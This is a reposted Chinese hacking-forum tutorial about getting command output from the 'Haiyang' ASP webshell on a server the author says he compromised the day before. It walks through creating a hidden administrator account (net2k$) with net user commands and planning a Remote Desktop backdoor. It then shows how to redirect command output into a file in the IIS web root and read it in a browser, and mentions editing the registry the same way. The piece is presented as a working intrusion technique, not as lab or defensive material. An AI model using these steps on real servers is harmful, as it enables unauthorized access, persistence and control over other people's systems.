[转载]巧妙解决海洋ASP木马cmd命令无回显问题

文章作者：net2k
信息来源：www.52chb.com

昨天黑的服务器，由于疏忽，还有些文件未进行扫尾清理，今天打算上个后门开3389服务。轻车熟路，打开海洋asp木马，把自己写好用来添加ID和开启服务的程序和准备好的开3389程序上传了上去，给我的结果是"0个文件上传"，狂晕...差点没把我给气死...难道管理员有所察觉?但是我昨天上传的垃圾文件他不可能没发现呀?额头落一滴汗珠-----郁闷ing......这下我可是后悔得不得了，恨自己昨天没一口气黑到底，不停的叹气，不管它了，反正还能利用这匹马儿来为我出力-------姑且死马当活马医,碰碰运气吧:(,(因为asp木马不是最高权限......)....在cmd命令框里输入:
------------------------------------------------------------
net user net2k$ 1234 /add //回车
net localgroup administrators net2k$ /add //回车
------------------------------------------------------------
这里遇到一个问题，由于不能回显，根本看不到帐户是否添加成功，
望着“不回显CMD命令”几个字，正长吁短叹之际，突然眼前一亮，想到了echo重定向命令，真是"山穷水尽疑无路，柳暗花明又一村"。关于这个echo命令，我这里在网上抄了一段例子说明下，新手如果不明白的可以去google搜索相关资料，这方面的资料是很多的~!
===============================================================================================


假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什么区别。
-------------------------------------------------------
echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm
echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm
-------------------------------------------------------
第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。
第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到index.htm里面。
-------------------------------------------------------
“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。
这里说明一下，<和>是重定向命令只是一个是输入重定向另一个是输出重定向，比如我们在命令提示符下就会显示c:\>这个
意思就是把C盘的命令权重定向给我们，同样：也是定向的命令也叫作管道，它是用来连接两个命令的管道，先执行管道左边
的命令，再执行管道右边的命令.
===============================================================================================
呵呵，懂echo原理的朋友就不必看了。其实这个方法的思路就是把命令的回显重定向到网站IIS目录的某个文件里，然后用IE访问它，IE里我门就可以间接看到命令的回显了。打个比方，网站IIS的物理路径是：
------------------------------------------------------------
D:\Inetpub\wwwroot\
------------------------------------------------------------

而在wwwroot\下又有很多站点，我们就把文件写入其中任意一个站点，请看命令:
------------------------------------------------------------
net user>D:\Inetpub\wwwroot\tty\chb.txt
------------------------------------------------------------

这样，我们就把net user的命令回显写进了一个tty的目录。那么我们又要如何察看这个文件呢？这也很简单，因为我黑这个服务器是从一个网站渗头进入的，我echo文件也是写进这个网站的根目录的。所以我直
接在IE地址栏里写上这个网站地址再在地址的后面加chb.txt这个文件名就可以访问了。比如这个网站的地址是:
------------------------------------------------------------
http://www.x.net/
------------------------------------------------------------


我们就写：
------------------------------------------------------------
http://www.x.net/chb.txt
------------------------------------------------------------

当然，如果你echo文件时，不是把重定向写到这个网站的根目录，这样是根本访问不了的。呵呵，接下来的事情就是不停的执行你的命令，在IE这端不停按F5刷新就OK了。题外话，用这个命令我们还可以生成注册表文件，直接修改服务器的注册表等等....反正是可以做很多事情的啦^_^!